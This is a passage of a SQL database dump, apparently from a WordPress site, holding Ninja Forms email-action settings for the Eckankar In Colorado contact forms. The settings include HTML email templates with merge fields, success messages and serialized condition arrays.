cellspacing=\"0\" width=\"100%\" id=\"emailBody\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\"><br /><br />\r\n                                   <p><strong>Hello {field:textbox_322},</strong><br /><br />\r\n                                  </p><br /><br />\r\n                                  <p>You have created a new form submission on the Eckankar In Colorado website.                                      Your submission is requesting contact with a person on the \"Western Slope Leadership Communication\" team.</p><br /><br />\r\n                              <p>Here is a copy of the information that you have submitted: </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                          <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding:10px;border: 1px solid #cccccc\"><br /><br />\r\n                                    <p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_322}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_323}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_324}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> [ninja_forms_field id=271]</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> [ninja_forms_field id=272]<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> [ninja_forms_field id=275]</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_327}</span></p><br /><br />\r\n                                </td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailFooter\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n                                  Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color:#23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n  <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><br /><br />\r\n                                </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                            <br /><br />\r\n                            <br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n            </table><br /><br />\r\n        </td><br /><br />\r\n    </tr><br /><br />\r\n</table><br /><br />\r\n'),(2596,98,'attach_csv','0','attach_csv','0'),(2597,98,'email_format','html','email_format','html'),(2598,98,'reply_to','','reply_to',''),(2599,98,'cc','','cc',''),(2600,98,'bcc','','bcc',''),(2601,98,'redirect_url','','redirect_url',''),(2602,98,'success_msg','','success_msg',''),(2603,98,'label','Send copy to user','label','Send copy to user'),(2604,98,'parent_id','25','parent_id','25'),(2605,99,'title','','title',''),(2606,99,'key','','key',''),(2607,99,'type','successmessage','type','successmessage'),(2608,99,'active','1','active','1'),(2609,99,'created_at','2018-01-03 11:46:01','created_at','2018-01-03 11:46:01'),(2610,99,'date_updated','2016-01-15','date_updated','2016-01-15'),(2611,99,'from_name','','from_name',''),(2612,99,'from_address','','from_address',''),(2613,99,'to','{wp:admin_email}','to','{wp:admin_email}'),(2614,99,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(2615,99,'email_message','{fields_table}','email_message','{fields_table}'),(2616,99,'attach_csv','0','attach_csv','0'),(2617,99,'email_format','html','email_format','html'),(2618,99,'reply_to','','reply_to',''),(2619,99,'cc','','cc',''),(2620,99,'bcc','','bcc',''),(2621,99,'redirect_url','','redirect_url',''),(2622,99,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>'),(2623,99,'label','Success Message','label','Success Message'),(2624,99,'parent_id','25','parent_id','25'),(2625,100,'title','','title',''),(2626,100,'key','','key',''),(2627,100,'type','email','type','email'),(2628,100,'active','1','active','1'),(2629,100,'created_at','2018-01-03 11:46:01','created_at','2018-01-03 11:46:01'),(2630,100,'date_updated','2016-01-19','date_updated','2016-01-19'),(2631,100,'from_name','Webmaster Contact Form','from_name','Webmaster Contact Form'),(2632,100,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(2633,100,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(2634,100,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(2635,100,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><tbody><tr><td align=\"left\" valign=\"top\"><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><h1>Eckankar In Colorado</h1></td><td> </td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\"><p><strong>Hello! You have a new \"Webmaster Contact\" form submission.<br /></strong><br /> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the person to receive these web submissions.</p></td></tr></tbody></table><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_322}<br /> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_323}<br /> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_324}<br /> </span><span style=\"color: #333333\"><strong>MESSAGE SUBJECT:</strong> {field:textbox_326}</span><br /> <br /><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE:<br /></strong>{field:textarea_327}</span></p></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><tbody><tr><td align=\"left\" valign=\"top\"><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><h1>Eckankar In Colorado</h1></td><td> </td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\"><p><strong>Hello! You have a new \"Webmaster Contact\" form submission.<br /></strong><br /> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the person to receive these web submissions.</p></td></tr></tbody></table><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_322}<br /> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_323}<br /> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_324}<br /> </span><span style=\"color: #333333\"><strong>MESSAGE SUBJECT:</strong> {field:textbox_326}</span><br /> <br /><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE:<br /></strong>{field:textarea_327}</span></p></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>'),(2636,100,'attach_csv','0','attach_csv','0'),(2637,100,'email_format','html','email_format','html'),(2638,100,'reply_to','','reply_to',''),(2639,100,'cc','','cc',''),(2640,100,'bcc','','bcc',''),(2641,100,'redirect_url','','redirect_url',''),(2642,100,'success_msg','','success_msg',''),(2643,100,'label','Admin Email','label','Admin Email'),(2644,100,'parent_id','25','parent_id','25'),(3085,117,'title','','title',''),(3086,117,'key','','key',''),(3087,117,'type','save','type','save'),(3088,117,'active','1','active','1'),(3089,117,'created_at','2018-01-03 11:43:08','created_at','2018-01-03 11:43:08'),(3090,117,'label','Save Form','label','Save Form'),(3091,117,'objectType','Action','objectType','Action'),(3092,117,'objectDomain','actions','objectDomain','actions'),(3093,117,'editActive','','editActive',''),(3094,117,'conditions','a:6:{s:9:\"collapsed\";b:0;s:7:\"process\";i:1;s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";b:0;s:7:\"process\";i:1;s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(3095,117,'payment_gateways','','payment_gateways',''),(3096,117,'payment_total','0','payment_total','0'),(3097,117,'tag','','tag',''),(3098,117,'to','{wp:admin_email}','to','{wp:admin_email}'),(3099,117,'reply_to','','reply_to',''),(3100,117,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(3101,117,'email_message','{fields_table}','email_message','{fields_table}'),(3102,117,'email_message_plain','','email_message_plain',''),(3103,117,'from_name','','from_name',''),(3104,117,'from_address','','from_address',''),(3105,117,'email_format','html','email_format','html'),(3106,117,'cc','','cc',''),(3107,117,'bcc','','bcc',''),(3108,117,'redirect_url','','redirect_url',''),(3109,117,'parent_id','30','parent_id','30'),(3110,118,'title','','title',''),(3111,118,'key','','key',''),(3112,118,'type','email','type','email'),(3113,118,'active','1','active','1'),(3114,118,'created_at','2018-01-03 11:43:08','created_at','2018-01-03 11:43:08'),(3115,118,'date_updated','2016-01-15','date_updated','2016-01-15'),(3116,118,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(3117,118,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(3118,118,'to','{field:email_59}','to','{field:email_59}'),(3119,118,'email_subject','Western Slope Leadership Communication','email_subject','Western Slope Leadership Communication'),(3120,118,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_57},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Western Slope Leadership Communication team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_57}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_58}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_59}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_60}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_61}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_64}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_65}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_57},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Western Slope Leadership Communication team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_57}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_58}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_59}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_60}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_61}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_64}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_65}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(3121,118,'attach_csv','0','attach_csv','0'),(3122,118,'email_format','html','email_format','html'),(3123,118,'reply_to','','reply_to',''),(3124,118,'cc','','cc',''),(3125,118,'bcc','','bcc',''),(3126,118,'redirect_url','','redirect_url',''),(3127,118,'success_msg','','success_msg',''),(3128,118,'label','Send copy to user','label','Send copy to user'),(3129,118,'objectType','Action','objectType','Action'),(3130,118,'objectDomain','actions','objectDomain','actions'),(3131,118,'editActive','','editActive',''),(3132,118,'conditions','a:6:{s:9:\"collapsed\";b:0;s:7:\"process\";i:1;s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";b:0;s:7:\"process\";i:1;s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(3133,118,'payment_gateways','','payment_gateways',''),(3134,118,'payment_total','0','payment_total','0'),(3135,118,'tag','','tag',''),(3136,118,'email_message_plain','','email_message_plain',''),(3137,118,'parent_id','30','parent_id','30'),(3138,119,'title','','title',''),(3139,119,'key','','key',''),(3140,119,'type','successmessage','type','successmessage'),(3141,119,'active','1','active','1'),(3142,119,'created_at','2018-01-03 11:43:08','created_at','2018-01-03 11:43:08'),(3143,119,'date_updated','2016-01-15','date_updated','2016-01-15'),(3144,119,'from_name','','from_name',''),(3145,119,'from_address','','from_address',''),(3146,119,'to','{wp:admin_email}','to','{wp:admin_email}'),(3147,119,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(3148,119,'email_message','{fields_table}','email_message','{fields_table}'),(3149,119,'attach_csv','0','attach_csv','0'),(3150,119,'email_format','html','email_format','html'),(3151,119,'reply_to','','reply_to',''),(3152,119,'cc','','cc',''),(3153,119,'bcc','','bcc',''),(3154,119,'redirect_url','','redirect_url',''),(3155,119,'success_msg','<div style=\"text-align: center\">\r\n\r\n<span style=\"font-size: 14pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span>\r\n\r\nWe appreciate you taking the time to communicate with us.\r\nYour specific request(s) will be forwarded to the selected leader here in Colorado.\r\nYou will then be contacted regarding your submission.\r\n\r\n</div>','success_msg','<div style=\"text-align: center\">\r\n\r\n<span style=\"font-size: 14pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span>\r\n\r\nWe appreciate you taking the time to communicate with us.\r\nYour specific request(s) will be forwarded to the selected leader here in Colorado.\r\nYou will then be contacted regarding your submission.\r\n\r\n</div>'),(3156,119,'label','Success Message','label','Success Message'),(3157,119,'objectType','Action','objectType','Action'),(3158,119,'objectDomain','actions','objectDomain','actions'),(3159,119,'editActive','','editActive',''),(3160,119,'conditions','a:6:{s:9:\"collapsed\";b:0;s:7:\"process\";i:1;s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";b:0;s:7:\"process\";i:1;s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(3161,119,'payment_gateways','','payment_gateways',''),(3162,119,'payment_total','0','payment_total','0'),(3163,119,'tag','','tag',''),(3164,119,'email_message_plain','','email_message_plain',''),(3165,119,'parent_id','30','parent_id','30'),(3166,120,'title','','title',''),(3167,120,'key','','key',''),(3168,120,'type','email','type','email'),(3169,120,'active','1','active','1'),(3170,120,'created_at','2018-01-03 11:43:08','created_at','2018-01-03 11:43:08'),(3171,120,'date_updated','2016-01-19','date_updated','2016-01-19'),(3172,120,'from_name','Western Slope Leadership Communication','from_name','Western Slope Leadership Communication'),(3173,120,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(3174,120,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(3175,120,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(3176,120,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Western Slope Leadership Communications</span> form submission.<br /><br /><br />\r\n</strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Western Slope ECK organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\nThe following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_57} {field:lastname_58}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_57}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_58}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_59}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_60}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_61}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_64}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: 